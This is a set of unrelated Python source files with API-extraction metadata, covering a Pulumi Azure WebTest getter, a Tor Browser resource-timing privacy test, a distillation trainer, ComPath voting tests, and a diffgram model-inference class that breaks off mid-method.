Interval in seconds between test runs for this WebTest. Default value is 300.
"""
return pulumi.get(self, "frequency")
@property
@pulumi.getter
def id(self) -> str:
"""
Azure resource Id
"""
return pulumi.get(self, "id")
@property
@pulumi.getter
def kind(self) -> Optional[str]:
"""
The kind of WebTest that this web test watches. Choices are ping and multistep.
"""
return pulumi.get(self, "kind")
@property
@pulumi.getter
def location(self) -> str:
"""
Resource location
"""
return pulumi.get(self, "location")
@property
@pulumi.getter
def locations(self) -> Sequence['outputs.WebTestGeolocationResponse']:
"""
A list of where to physically run the tests from to give global coverage for accessibility of your application.
"""
return pulumi.get(self, "locations")
@property
@pulumi.getter
def name(self) -> str:
"""
Azure resource name
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="provisioningState")
def provisioning_state(self) -> str:
"""
Current state of this component, whether or not is has been provisioned within the resource group it is defined. Users cannot change this value but are able to read from it. Values will include Succeeded, Deploying, Canceled, and Failed.
"""
return pulumi.get(self, "provisioning_state")
@property
@pulumi.getter
def request(self) -> Optional['outputs.WebTestPropertiesResponseRequest']:
"""
The collection of request properties
"""
return pulumi.get(self, "request")
@property
@pulumi.getter(name="retryEnabled")
def retry_enabled(self) -> Optional[bool]:
"""
Allow for retries should this WebTest fail.
"""
return pulumi.get(self, "retry_enabled")
@property
@pulumi.getter(name="syntheticMonitorId")
def synthetic_monitor_id(self) -> str:
"""
Unique ID of this WebTest. This is typically the same value as the Name field.
"""
return pulumi.get(self, "synthetic_monitor_id")
@property
@pulumi.getter
def tags(self) -> Optional[Mapping[str, str]]:
"""
Resource tags
"""
return pulumi.get(self, "tags")
@property
@pulumi.getter
def timeout(self) -> Optional[int]:
"""
Seconds until this WebTest will timeout and fail. Default value is 30.
"""
return pulumi.get(self, "timeout")
@property
@pulumi.getter
def type(self) -> str:
"""
Azure resource type
"""
return pulumi.get(self, "type")
@property
@pulumi.getter(name="validationRules")
def validation_rules(self) -> Optional['outputs.WebTestPropertiesResponseValidationRules']:
"""
The collection of validation rule properties
"""
return pulumi.get(self, "validation_rules")
@property
@pulumi.getter(name="webTestKind")
def web_test_kind(self) -> str:
"""
The kind of web test this is, valid choices are ping, multistep, basic, and standard.
"""
return pulumi.get(self, "web_test_kind")
@property
@pulumi.getter(name="webTestName")
def web_test_name(self) -> str:
"""
User defined name if this WebTest.
"""
return pulumi.get(self, "web_test_name")
class AwaitableGetWebTestResult(GetWebTestResult):
# pylint: disable=using-constant-test
def __await__(self):
if False:
yield self
return GetWebTestResult(
configuration=self.configuration,
description=self.description,
enabled=self.enabled,
frequency=self.frequency,
id=self.id,
kind=self.kind,
location=self.location,
locations=self.locations,
name=self.name,
provisioning_state=self.provisioning_state,
request=self.request,
retry_enabled=self.retry_enabled,
synthetic_monitor_id=self.synthetic_monitor_id,
tags=self.tags,
timeout=self.timeout,
type=self.type,
validation_rules=self.validation_rules,
web_test_kind=self.web_test_kind,
web_test_name=self.web_test_name)
def get_web_test(resource_group_name: Optional[str] = None,
web_test_name: Optional[str] = None,
opts: Optional[pulumi.InvokeOptions] = None) -> AwaitableGetWebTestResult:
"""
An Application Insights WebTest definition.
:param str resource_group_name: The name of the resource group. The name is case insensitive.
:param str web_test_name: The name of the Application Insights WebTest resource.
"""
__args__ = dict()
__args__['resourceGroupName'] = resource_group_name
__args__['webTestName'] = web_test_name
if opts is None:
opts = pulumi.InvokeOptions()
if opts.version is None:
opts.version = _utilities.get_version()
__ret__ = pulumi.runtime.invoke('azure-native:insights/v20201005preview:getWebTest', __args__, opts=opts, typ=GetWebTestResult).value
return AwaitableGetWebTestResult(
configuration=__ret__.configuration,
description=__ret__.description,
enabled=__ret__.enabled,
frequency=__ret__.frequency,
id=__ret__.id,
kind=__ret__.kind,
location=__ret__.location,
locations=__ret__.locations,
name=__ret__.name,
provisioning_state=__ret__.provisioning_state,
request=__ret__.request,
retry_enabled=__ret__.retry_enabled,
synthetic_monitor_id=__ret__.synthetic_monitor_id,
tags=__ret__.tags,
timeout=__ret__.timeout,
type=__ret__.type,
validation_rules=__ret__.validation_rules,
web_test_kind=__ret__.web_test_kind,
web_test_name=__ret__.web_test_name)
|
[
"pulumi.get",
"pulumi.getter",
"pulumi.set",
"pulumi.InvokeOptions",
"pulumi.runtime.invoke"
] |
[((6304, 6343), 'pulumi.getter', 'pulumi.getter', ([], {'name': '"""provisioningState"""'}), "(name='provisioningState')\n", (6317, 6343), False, 'import pulumi\n'), ((6954, 6988), 'pulumi.getter', 'pulumi.getter', ([], {'name': '"""retryEnabled"""'}), "(name='retryEnabled')\n", (6967, 6988), False, 'import pulumi\n'), ((7181, 7221), 'pulumi.getter', 'pulumi.getter', ([], {'name': '"""syntheticMonitorId"""'}), "(name='syntheticMonitorId')\n", (7194, 7221), False, 'import pulumi\n'), ((7996, 8033), 'pulumi.getter', 'pulumi.getter', ([], {'name': '"""validationRules"""'}), "(name='validationRules')\n", (8009, 8033), False, 'import pulumi\n'), ((8279, 8312), 'pulumi.getter', 'pulumi.getter', ([], {'name': '"""webTestKind"""'}), "(name='webTestKind')\n", (8292, 8312), False, 'import pulumi\n'), ((8536, 8569), 'pulumi.getter', 'pulumi.getter', ([], {'name': '"""webTestName"""'}), "(name='webTestName')\n", (8549, 8569), False, 'import pulumi\n'), ((1035, 1087), 'pulumi.set', 'pulumi.set', (['__self__', '"""configuration"""', 'configuration'], {}), "(__self__, 'configuration', configuration)\n", (1045, 1087), False, 'import pulumi\n'), ((1232, 1280), 'pulumi.set', 'pulumi.set', (['__self__', '"""description"""', 'description'], {}), "(__self__, 'description', description)\n", (1242, 1280), False, 'import pulumi\n'), ((1415, 1455), 'pulumi.set', 'pulumi.set', (['__self__', '"""enabled"""', 'enabled'], {}), "(__self__, 'enabled', enabled)\n", (1425, 1455), False, 'import pulumi\n'), ((1594, 1638), 'pulumi.set', 'pulumi.set', (['__self__', '"""frequency"""', 'frequency'], {}), "(__self__, 'frequency', frequency)\n", (1604, 1638), False, 'import pulumi\n'), ((1756, 1786), 'pulumi.set', 'pulumi.set', (['__self__', '"""id"""', 'id'], {}), "(__self__, 'id', id)\n", (1766, 1786), False, 'import pulumi\n'), ((1910, 1944), 'pulumi.set', 'pulumi.set', (['__self__', '"""kind"""', 'kind'], {}), "(__self__, 'kind', kind)\n", (1920, 1944), False, 'import pulumi\n'), ((2080, 2122), 'pulumi.set', 'pulumi.set', (['__self__', '"""location"""', 'location'], {}), "(__self__, 'location', location)\n", (2090, 2122), False, 'import pulumi\n'), ((2263, 2307), 'pulumi.set', 'pulumi.set', (['__self__', '"""locations"""', 'locations'], {}), "(__self__, 'locations', locations)\n", (2273, 2307), False, 'import pulumi\n'), ((2431, 2465), 'pulumi.set', 'pulumi.set', (['__self__', '"""name"""', 'name'], {}), "(__self__, 'name', name)\n", (2441, 2465), False, 'import pulumi\n'), ((2631, 2693), 'pulumi.set', 'pulumi.set', (['__self__', '"""provisioning_state"""', 'provisioning_state'], {}), "(__self__, 'provisioning_state', provisioning_state)\n", (2641, 2693), False, 'import pulumi\n'), ((2828, 2868), 'pulumi.set', 'pulumi.set', (['__self__', '"""request"""', 'request'], {}), "(__self__, 'request', request)\n", (2838, 2868), False, 'import pulumi\n'), ((3021, 3073), 'pulumi.set', 'pulumi.set', (['__self__', '"""retry_enabled"""', 'retry_enabled'], {}), "(__self__, 'retry_enabled', retry_enabled)\n", (3031, 3073), False, 'import pulumi\n'), ((3245, 3311), 'pulumi.set', 'pulumi.set', (['__self__', '"""synthetic_monitor_id"""', 'synthetic_monitor_id'], {}), "(__self__, 'synthetic_monitor_id', synthetic_monitor_id)\n", (3255, 3311), False, 'import pulumi\n'), ((3437, 3471), 'pulumi.set', 'pulumi.set', (['__self__', '"""tags"""', 'tags'], {}), "(__self__, 'tags', tags)\n", (3447, 3471), False, 'import pulumi\n'), ((3604, 3644), 'pulumi.set', 'pulumi.set', (['__self__', '"""timeout"""', 'timeout'], {}), "(__self__, 'timeout', timeout)\n", (3614, 3644), False, 'import pulumi\n'), ((3768, 3802), 'pulumi.set', 'pulumi.set', (['__self__', '"""type"""', 'type'], {}), "(__self__, 'type', type)\n", (3778, 3802), False, 'import pulumi\n'), ((3964, 4022), 'pulumi.set', 'pulumi.set', (['__self__', '"""validation_rules"""', 'validation_rules'], {}), "(__self__, 'validation_rules', validation_rules)\n", (3974, 4022), False, 'import pulumi\n'), ((4173, 4225), 'pulumi.set', 'pulumi.set', (['__self__', '"""web_test_kind"""', 'web_test_kind'], {}), "(__self__, 'web_test_kind', web_test_kind)\n", (4183, 4225), False, 'import pulumi\n'), ((4376, 4428), 'pulumi.set', 'pulumi.set', (['__self__', '"""web_test_name"""', 'web_test_name'], {}), "(__self__, 'web_test_name', web_test_name)\n", (4386, 4428), False, 'import pulumi\n'), ((4651, 4684), 'pulumi.get', 'pulumi.get', (['self', '"""configuration"""'], {}), "(self, 'configuration')\n", (4661, 4684), False, 'import pulumi\n'), ((4853, 4884), 'pulumi.get', 'pulumi.get', (['self', '"""description"""'], {}), "(self, 'description')\n", (4863, 4884), False, 'import pulumi\n'), ((5045, 5072), 'pulumi.get', 'pulumi.get', (['self', '"""enabled"""'], {}), "(self, 'enabled')\n", (5055, 5072), False, 'import pulumi\n'), ((5274, 5303), 'pulumi.get', 'pulumi.get', (['self', '"""frequency"""'], {}), "(self, 'frequency')\n", (5284, 5303), False, 'import pulumi\n'), ((5428, 5450), 'pulumi.get', 'pulumi.get', (['self', '"""id"""'], {}), "(self, 'id')\n", (5438, 5450), False, 'import pulumi\n'), ((5649, 5673), 'pulumi.get', 'pulumi.get', (['self', '"""kind"""'], {}), "(self, 'kind')\n", (5659, 5673), False, 'import pulumi\n'), ((5804, 5832), 'pulumi.get', 'pulumi.get', (['self', '"""location"""'], {}), "(self, 'location')\n", (5814, 5832), False, 'import pulumi\n'), ((6101, 6130), 'pulumi.get', 'pulumi.get', (['self', '"""locations"""'], {}), "(self, 'locations')\n", (6111, 6130), False, 'import pulumi\n'), ((6259, 6283), 'pulumi.get', 'pulumi.get', (['self', '"""name"""'], {}), "(self, 'name')\n", (6269, 6283), False, 'import pulumi\n'), ((6670, 6708), 'pulumi.get', 'pulumi.get', (['self', '"""provisioning_state"""'], {}), "(self, 'provisioning_state')\n", (6680, 6708), False, 'import pulumi\n'), ((6906, 6933), 'pulumi.get', 'pulumi.get', (['self', '"""request"""'], {}), "(self, 'request')\n", (6916, 6933), False, 'import pulumi\n'), ((7127, 7160), 'pulumi.get', 'pulumi.get', (['self', '"""retry_enabled"""'], {}), "(self, 'retry_enabled')\n", (7137, 7160), False, 'import pulumi\n'), ((7391, 7431), 'pulumi.get', 'pulumi.get', (['self', '"""synthetic_monitor_id"""'], {}), "(self, 'synthetic_monitor_id')\n", (7401, 7431), False, 'import pulumi\n'), ((7578, 7602), 'pulumi.get', 'pulumi.get', (['self', '"""tags"""'], {}), "(self, 'tags')\n", (7588, 7602), False, 'import pulumi\n'), ((7795, 7822), 'pulumi.get', 'pulumi.get', (['self', '"""timeout"""'], {}), "(self, 'timeout')\n", (7805, 7822), False, 'import pulumi\n'), ((7951, 7975), 'pulumi.get', 'pulumi.get', (['self', '"""type"""'], {}), "(self, 'type')\n", (7961, 7975), False, 'import pulumi\n'), ((8222, 8258), 'pulumi.get', 'pulumi.get', (['self', '"""validation_rules"""'], {}), "(self, 'validation_rules')\n", (8232, 8258), False, 'import pulumi\n'), ((8482, 8515), 'pulumi.get', 'pulumi.get', (['self', '"""web_test_kind"""'], {}), "(self, 'web_test_kind')\n", (8492, 8515), False, 'import pulumi\n'), ((8688, 8721), 'pulumi.get', 'pulumi.get', (['self', '"""web_test_name"""'], {}), "(self, 'web_test_name')\n", (8698, 8721), False, 'import pulumi\n'), ((10275, 10297), 'pulumi.InvokeOptions', 'pulumi.InvokeOptions', ([], {}), '()\n', (10295, 10297), False, 'import pulumi\n'), ((10389, 10510), 'pulumi.runtime.invoke', 'pulumi.runtime.invoke', (['"""azure-native:insights/v20201005preview:getWebTest"""', '__args__'], {'opts': 'opts', 'typ': 'GetWebTestResult'}), "('azure-native:insights/v20201005preview:getWebTest',\n __args__, opts=opts, typ=GetWebTestResult)\n", (10410, 10510), False, 'import pulumi\n')]
|
# This test checks whether the Resource Timing API (see:
# http://www.w3.org/TR/resource-timing/) is really disabled in the default
# Tor Browser. Setting |dom.enable_resource_timing| to |false| and testing that
# might not be sufficient.
from marionette_harness import MarionetteTestCase
class Test(MarionetteTestCase):
def setUp(self):
MarionetteTestCase.setUp(self)
self.TEST_URL = "https://www.mediawiki.org/wiki/MediaWiki"
self.RESOURCE_URL = "https://upload.wikimedia.org/wikipedia/mediawiki/b/bc/Wiki.png"
def test_resource_timing(self):
with self.marionette.using_context('content'):
self.marionette.navigate(self.TEST_URL)
# If resource timing is disabled we should not be able to get resource
# entries at all in the first place. We test all three methods for safety's
# sake.
# getEntriesByType()
err_msg = 'resource entries found (getEntriesByType())'
self.assertTrue(self.marionette.execute_script("""
try {
var resources = document.defaultView.performance.
getEntriesByType("resource")[0];
} catch (e) {
return false;
}
return resources == undefined;
"""),
msg=err_msg)
# getEntriesByName()
err_msg = "resource entries found (getEntriesByName())"
self.assertTrue(self.marionette.execute_script("""
try {
var resources = document.defaultView.performance.
getEntriesByName(arguments[0])[0];
} catch (e) {
return false;
}
return resources == undefined;
""", script_args=[self.RESOURCE_URL]),
msg=err_msg)
# getEntries()
err_msg = "resource entries found (getEntries())"
self.assertTrue(self.marionette.execute_script("""
try {
var resources = document.defaultView.performance.
getEntries()[0];
} catch (e) {
return false;
}
return resources == undefined;
"""),
msg=err_msg)
|
[
"marionette_harness.MarionetteTestCase.setUp"
] |
[((353, 383), 'marionette_harness.MarionetteTestCase.setUp', 'MarionetteTestCase.setUp', (['self'], {}), '(self)\n', (377, 383), False, 'from marionette_harness import MarionetteTestCase\n')]
|
from typing import Any, Callable, Tuple
from cfg import Opts
from mlutils import gen, mod
from torch.functional import Tensor
from torch.optim import SGD
from timm.optim import create_optimizer_v2
from torch.optim.lr_scheduler import StepLR
from torch import nn
import torch
from .distill import BaseDistillTrainer
from .losses import DistillationLoss
__all__ = ['OfflineDistillTrainer']
class OfflineDistillTrainer(BaseDistillTrainer):
@gen.synchrony
def __init__(
self,
opt: Opts,
student_model: nn.Module,
) -> None:
assert opt.get('teacher_id', None) is not None
opt.set('exp_id', opt.teacher_id)
super().__init__(opt)
teacher_model = self.model_manager.load_model()
self.teacher_model = self.setup_teacher(teacher_model)
self.student_model = student_model
self.student_optimizer = create_optimizer_v2(
student_model,
opt.get('student_optimizer', 'sgd'),
learning_rate=opt.student_lr,
weight_decay=opt.get('student_weight_decay', 1.0e-4)
)
self.student_scheduler = StepLR(self.student_optimizer, 20, 0.95)
self.teacher_model = yield self.to_gpu(self.teacher_model)
self.student_model = yield self.to_gpu(self.student_model)
self.actual_loss_fn = nn.CrossEntropyLoss()
self.distill_loss_fn = DistillationLoss(
distillation_type=opt.get('distillation_type', 'hard'),
tau=opt.get('distillation_tau', 1.0)
)
def train_teacher_step(
self, *item: Tuple[Any]
) -> Tuple[Tensor, Tensor]:
images, labels = item
with torch.no_grad():
logits = self.teacher_model(images)
loss = self.actual_loss_fn(logits, labels)
return loss, logits
def train_student_step(
self, *item: Tuple[Any]
) -> Tuple[Tensor, Tensor]:
images, labels, teacher_logits = item
self.student_optimizer.zero_grad()
student_out = self.student_model(images)
if isinstance(student_out, tuple):
logits = student_out[0]
dist_logits = student_out[1]
else:
logits = student_out
dist_logits = student_out
actual_loss = self.actual_loss_fn(logits, labels)
distill_loss = self.distill_loss_fn(dist_logits, teacher_logits)
loss = actual_loss + distill_loss
loss.backward()
self.student_optimizer.step()
return loss, logits
@gen.detach_cpu
@gen.synchrony
def train_step(self, item):
images, labels = item
images = yield self.to_gpu(images)
labels = yield self.to_gpu(labels)
labels = labels.type(torch.int64)
teacher_loss, teacher_logits = self.train_teacher_step(
images, labels
)
student_loss, student_logits = self.train_student_step(
images, labels, teacher_logits
)
total_loss = teacher_loss + student_loss
self.teacher_loss_meter.append(teacher_loss.detach())
self.student_loss_meter.append(student_loss.detach())
self.show_images('train_image', images)
preds = self.logit_to_pred(student_logits)
return total_loss, preds, labels
@gen.detach_cpu
@gen.synchrony
def eval_step(self, item):
images, labels = item
images = yield self.to_gpu(images)
labels = yield self.to_gpu(labels)
labels = labels.type(torch.int64)
logits = self.student_model(images)
loss = self.actual_loss_fn(logits, labels)
self.show_images('eval_image', images)
preds = self.logit_to_pred(logits)
return loss, preds, labels
@gen.synchrony
def inference(self, inp: Tensor) -> Tensor:
inp = yield self.to_gpu(inp)
if inp.ndim == 3:
inp = inp.unsqueeze(0)
with torch.no_grad():
logits = self.net(inp)
self.show_images('inference_image', inp)
preds = self.logit_to_pred(logits)
preds = yield self.to_cpu(preds.detach())
return preds
def on_epoch_end(self) -> None:
self.student_scheduler.step()
super().on_epoch_end()
def setup_teacher(
self,
teacher_model: nn.Module
) -> nn.Module:
for p in teacher_model.parameters():
p.requires_grad = False
return teacher_model
|
[
"torch.nn.CrossEntropyLoss",
"torch.no_grad",
"torch.optim.lr_scheduler.StepLR"
] |
[((1130, 1170), 'torch.optim.lr_scheduler.StepLR', 'StepLR', (['self.student_optimizer', '(20)', '(0.95)'], {}), '(self.student_optimizer, 20, 0.95)\n', (1136, 1170), False, 'from torch.optim.lr_scheduler import StepLR\n'), ((1335, 1356), 'torch.nn.CrossEntropyLoss', 'nn.CrossEntropyLoss', ([], {}), '()\n', (1354, 1356), False, 'from torch import nn\n'), ((1669, 1684), 'torch.no_grad', 'torch.no_grad', ([], {}), '()\n', (1682, 1684), False, 'import torch\n'), ((3914, 3929), 'torch.no_grad', 'torch.no_grad', ([], {}), '()\n', (3927, 3929), False, 'import torch\n')]
|
# -*- coding: utf-8 -*-
"""This module contains tests for the data model of ComPath."""
from compath.constants import EQUIVALENT_TO
from compath.models import User
from tests.constants import DatabaseMixin, KEGG, REACTOME
class TestVotingSystem(DatabaseMixin):
"""Test Voting System."""
def test_missing_manager_1(self):
"""Test that the mapping can't be created if the first manager can't be looked up."""
with self.assertRaises(ValueError):
self.manager.get_or_create_mapping('missing manager 1', '', '', REACTOME, '', '', '', '')
def test_missing_manager_2(self):
"""Test that the mapping can't be created if the second manager can't be looked up."""
with self.assertRaises(ValueError):
self.manager.get_or_create_mapping(REACTOME, '', '', '' 'missing manager 2', '', '', '', '')
def test_vote_up(self):
"""Test if votes are adding."""
current_user = User(email='my_email', id=1)
mapping_1, _ = self.manager.get_or_create_mapping(
KEGG,
'1',
'kegg pathway',
REACTOME,
'2',
'reactome pathway',
EQUIVALENT_TO,
current_user
)
vote = self.manager.get_or_create_vote(user=current_user, mapping=mapping_1)
self.assertEqual(1, self.manager.count_votes(), msg='Vote was not created')
self.assertEqual(True, vote.type, msg='Vote type is wrong')
def test_vote_down(self):
"""Test if votes are adding."""
current_user = User(email='my_email', id=1)
mapping_1, created = self.manager.get_or_create_mapping(
KEGG,
'1',
'kegg pathway',
REACTOME,
'2',
'reactome pathway',
EQUIVALENT_TO,
current_user
)
self.assertTrue(created, msg='Mapping not created')
vote = self.manager.get_or_create_vote(user=current_user, mapping=mapping_1, vote_type=False)
self.assertEqual(1, self.manager.count_votes(), msg='Vote was not created')
self.assertFalse(vote.type, msg='Vote type is wrong')
def test_double_voting(self):
"""Test voting."""
current_user_1 = User(email='my_email1', id=1)
current_user_2 = User(email='my_email2', id=2)
mapping_1, created = self.manager.get_or_create_mapping(
KEGG,
'1',
'kegg pathway',
REACTOME,
'2',
'reactome pathway',
EQUIVALENT_TO,
current_user_1
)
self.assertTrue(created, 'mapping not created')
mapping_2, created = self.manager.get_or_create_mapping(
REACTOME,
'2',
'reactome pathway',
KEGG,
'1',
'kegg pathway',
EQUIVALENT_TO,
current_user_2
)
self.assertFalse(created, 'mapping was created')
self.assertEqual(2, self.manager.count_votes(), msg='Problem with votes')
vote_1 = self.manager.get_or_create_vote(user=current_user_1, mapping=mapping_1, vote_type=False)
vote_2 = self.manager.get_or_create_vote(user=current_user_2, mapping=mapping_2)
self.assertEqual(2, self.manager.count_votes(), msg='Problem with votes')
self.assertFalse(vote_1.type, msg='First vote type is wrong')
self.assertTrue(vote_2.type, msg='Second vote type is wrong')
|
[
"compath.models.User"
] |
[((949, 977), 'compath.models.User', 'User', ([], {'email': '"""my_email"""', 'id': '(1)'}), "(email='my_email', id=1)\n", (953, 977), False, 'from compath.models import User\n'), ((1567, 1595), 'compath.models.User', 'User', ([], {'email': '"""my_email"""', 'id': '(1)'}), "(email='my_email', id=1)\n", (1571, 1595), False, 'from compath.models import User\n'), ((2255, 2284), 'compath.models.User', 'User', ([], {'email': '"""my_email1"""', 'id': '(1)'}), "(email='my_email1', id=1)\n", (2259, 2284), False, 'from compath.models import User\n'), ((2310, 2339), 'compath.models.User', 'User', ([], {'email': '"""my_email2"""', 'id': '(2)'}), "(email='my_email2', id=2)\n", (2314, 2339), False, 'from compath.models import User\n')]
|
from diffgram.brain.inference import Inference
import tempfile
# TODO import these only if local prediction is needed
import cv2
try:
import tensorflow as tf
except:
print("Could not import tensorflow")
import numpy as np
import requests
import scipy.misc
import diffgram.utils.visualization_utils as vis_util
class Brain():
def __init__(
self,
client,
name=None,
id=None,
local=False,
use_temp_storage=True
):
"""
client, project client object
name, string, exact match for Project AI name
local, bool, run model locally
if local is true will perform additional setup work local_setup()
"""
self.client = client
if self.client.project_string_id is None:
raise Exception("\n No project string id in client.")
self.name = name
self.id = id
self.status = None
self.local = local
self.method = None
self.sub_method = None
self.min_score_thresh = .5
self.build_complete = None
self.model_path = None
self.image_to_run = None
self.use_temp_storage = use_temp_storage
self.local_model_storage_path = None
if self.local is True:
# These are only needed for local operations
self.temp = tempfile.mkdtemp()
self.local_setup()
def inference_from_response(
self,
dict):
# Assumes object detection
# TODO condition on method
inference = Inference(
method = "object_detection",
id = dict['id'],
status = dict['status'],
box_list = dict['box_list'],
score_list = dict['score_list'],
label_list = dict['label_list']
)
return inference
def predict_from_url(
self,
url):
"""
url, string, web end point to get file
"""
if self.local is True:
raise Exception("Not supported for local models yet.")
request = {}
request['url'] = url
request['ai_name'] = self.name
endpoint = "/api/walrus/v1/project/" + self.client.project_string_id + \
"/inference/from_url"
response = self.client.session.post(
self.client.host + endpoint,
json = request)
self.client.handle_errors(response)
data = response.json()
self.client.handle_errors(response)
inference = self.inference_from_response(data['inference'])
return inference
def predict_from_local(
self,
path):
"""
Make a prediction from a local file.
Creates a Diffgram file object and runs prediction.
This is roughly equal to running file.from_local() and predict()
but in one request (instead of two).
path, string, file path
"""
if self.local is True:
self.image_to_run = open(path, "rb")
# WIP
# TODO clean up, declare options for different types of expected inputs
# this is for model that expects numpy array as input
#self.image_np = scipy.misc.imread(path)
#self.image_np = self.resize(self.image_np)
# moved this here, was part of other thing prior
self.image_to_run = self.image_to_run.read()
self.run()
inference = self.inference_from_local()
return inference
if self.local is False:
files = {'file': open(path, 'rb')}
options = { 'immediate_mode' : 'True',
'ai_name' : self.name}
endpoint = "/api/walrus/v1/project/" + self.client.project_string_id \
+ "/inference/from_local"
response = self.client.session.post(
self.client.host + endpoint,
files = files,
data = options)
self.client.handle_errors(response)
data = response.json()
inference = self.inference_from_response(data['inference'])
return inference
# TODO handle creation of Inference and Instance objects
def run(
self,
image = None):
if self.build_complete is False:
return False
if image:
self.image_to_run = image
with self.graph.as_default():
# MUST HAVE compat.as_bytes for tf slim
# https://www.tensorflow.org/api_docs/python/tf/compat/as_bytes
# https://stackoverflow.com/questions/46687348/decoding-tfrecord-with-tfslim
self.image_to_run_expanded = tf.compat.as_bytes(self.image_to_run)
self.image_to_run_expanded = np.expand_dims(self.image_to_run_expanded, axis=0)
self.method = "object_detection"
if self.sub_method == "default" or self.sub_method is None:
self.run_object_detection()
inference = self.inference_from_local()
return inference
def run_object_detection(self):
(boxes, scores, classes, num) = self.sess.run(
[self.detection_boxes,
self.detection_scores,
self.detection_classes,
self.num_detections],
feed_dict = {
self.image_tensor: self.image_to_run_expanded } )
self.boxes = np.squeeze(boxes)
self.scores = np.squeeze(scores)
self.classes = np.squeeze(classes).astype(np.int32)
#print(self.boxes, self.scores, self.classes)
def nearest_iou(self, alpha, bravo):
_best_iou_hyper = .2
for i in range(len(alpha.box_list)):
best_iou = 0
best_index = None
# Find best IoU
for j in range(len(bravo.box_list)):
iou = Brain.calc_iou(alpha.box_list[i], bravo.box_list[j])
if iou >= best_iou:
best_iou = iou
best_index = j
if best_index is None:
continue
# handle large boxes, is the threat entirely inside the box?
alpha_box = alpha.box_list[i]
bravo_box = bravo.box_list[best_index]
if best_iou > _best_iou_hyper or best_iou > .01 and \
alpha_box[1] < bravo_box[1] and \
alpha_box[3] > bravo_box[3] and \
alpha_box[0] < bravo_box[0] and \
alpha_box[2] > bravo_box[2]:
# Assumes boxes have been thresholded already,
# This way threshold applies to nearest search too
class_id = bravo.label_list[best_index]
nearest_alpha_box = bravo.box_list[best_index]
# for stats
#self.average_iou = ( (best_iou + self.average_iou ) / 2)
# Where best_index is which bravo one
# is "in" which i index
print("alpha is in bravo", i, "in", best_index)
@staticmethod
def calc_iou(box_a, box_b):
# Calculate intersection, i.e. area of overlap between the 2 boxes (could be 0)
# http://math.stackexchange.com/a/99576
x_overlap = max(0, min(box_a[2], box_b[2]) - max(box_a[0], box_b[0]))
y_overlap = max(0, min(box_a[3], box_b[3]) - max(box_a[1], box_b[1]))
intersection = x_overlap * y_overlap
# Calculate union
area_box_a = (box_a[2] - box_a[0]) * (box_a[3] - box_a[1])
area_box_b = (box_b[2] - box_b[0]) * (box_b[3] - box_b[1])
union = area_box_a + area_box_b - intersection
if union == 0:
return 0
iou = intersection / union
return iou
def resize(self, image):
if image.shape[0] > 600 or image.shape[1] > 600:
ratio = min((300 / image.shape[0]),
(300 / image.shape[1]))
shape_x = int(round(image.shape[0] * ratio))
shape_y = int(round(image.shape[1] * ratio))
image = scipy.misc.imresize(image,
(shape_x, shape_y))
#print(image.shape)
return image
def predict_from_file(
self,
file_id):
"""
file_id, int, diffgram file id
Assumes singular file for now
"""
if self.local is True:
raise Exception("Not supported for local models yet.")
request = {}
request['file_list'] = [{'id' : file_id}]
request['ai_name'] = self.name
request['wait_for_inference'] = True
endpoint = "/api/walrus/project/" + self.client.project_string_id + \
"/inference/add"
response = self.client.session.post(
self.client.host + endpoint,
json = request)
self.client.handle_errors(response)
data = response.json()
inference = self.inference_from_response(data['inference'])
return inference
def local_setup(self):
"""
Intial setup for local prediction
"""
self.get_checkpoint_and_label_map()
self.build()
def get_checkpoint_and_label_map(self):
"""
Get download links
Download checkpoint file for AI name
"""
request = {}
request['ai_name'] = self.name
endpoint = "/api/walrus/project/" + self.client.project_string_id + \
"/brain/local_info"
response = self.client.session.post(
self.client.host + endpoint,
json = request)
self.client.handle_errors(response)
data = response.json()
ai = data['ai']
self.id = ai['id']
# TODO continue to try and clarify label map crazinesss
self.file_id_to_model_id = ai['label_dict']
#print("Label map", self.file_id_to_model_id)
self.model_id_to_file_id = {v: k for k, v in self.file_id_to_model_id.items()}
self.file_id_to_name = {v: k for k, v in self.client.name_to_file_id.items()}
self.build_model_id_to_name()
# Data has url for models and label map
# TODO clarify difference between local path and url to download model
if self.use_temp_storage is True:
self.model_path = self.temp + "/" + str(self.id) + ".pb"
if self.use_temp_storage is False:
self.model_path = self.local_model_storage_path
self.url_model = ai['url_model']
self.download_file(
url = self.url_model,
path = self.model_path)
def build_model_id_to_name(self):
"""Creates dictionary of COCO compatible categories keyed by category id.
Args:
categories: a list of dicts, each of which has the following keys:
'id': (required) an integer id uniquely identifying this category.
'name': (required) string representing category name
e.g., 'cat', 'dog', 'pizza'.
Returns:
category_index: a dict containing the same entries as categories, but keyed
by the 'id' field of each category.
"""
self.model_id_to_name = {}
for file_id, label_name in self.file_id_to_name.items():
model_id = self.file_id_to_model_id.get(str(file_id), None)
if model_id:
self.model_id_to_name[model_id] = {'name' : label_name}
#print(self.model_id_to_name)
def download_file(
self,
url,
path
):
retry = 0
while retry < 3:
if url[0 : 4] != "http":
return False
response = requests.get(url, stream=True)
if response.status_code != 200:
retry += 1
content_type = response.headers.get('content-type', None)
with open(path, 'wb') as file:
file.write(response.content)
return True
return False
def check_status(
self):
"""
"""
request = {}
request['ai_name'] = self.name
endpoint = "/api/walrus/v1/project/" + self.client.project_string_id + \
"/brain/status"
response = self.client.session.post(
self.client.host + endpoint,
json = request)
self.client.handle_errors(response)
data = response.json()
self.status = data['ai']['status']
def clean(self):
try:
shutil.rmtree(self.temp) # delete directory
except OSError as exc:
if exc.errno != errno.ENOENT: # ENOENT - no such file or directory
raise # re-raise exception
def build(self):
"""
Build graph for local prediction
Assumes it has the checkpoint ready to go
"""
self.graph = tf.Graph()
with self.graph.as_default():
#with tf.device('/cpu:0'): # for local cpu testing
graph_def = tf.GraphDef()
with tf.gfile.GFile(self.model_path, 'rb') as fid:
serialized_graph = fid.read()
graph_def.ParseFromString(serialized_graph)
tf.import_graph_def(graph_def, name='')
self.sess = tf.Session(graph=self.graph)
# TODO make this more flexible to work with different tensor types
self.image_tensor = self.graph.get_tensor_by_name('encoded_image_string_tensor:0')
self.detection_boxes = self.graph.get_tensor_by_name('detection_boxes:0')
self.detection_scores = self.graph.get_tensor_by_name('detection_scores:0')
self.detection_classes = self.graph.get_tensor_by_name('detection_classes:0')
self.num_detections = self.graph.get_tensor_by_name('num_detections:0')
self.build_complete = True
return True
def inference_from_local(
self,):
box_list = []
score_list = []
label_list = []
for i in range(self.boxes.shape[0]):
if self.scores[i] is None:
pass
if self.scores[i] > self.min_score_thresh:
#print("Detection")
box_list.append(self.boxes[i].tolist())
label_list.append(self.classes[i].tolist())
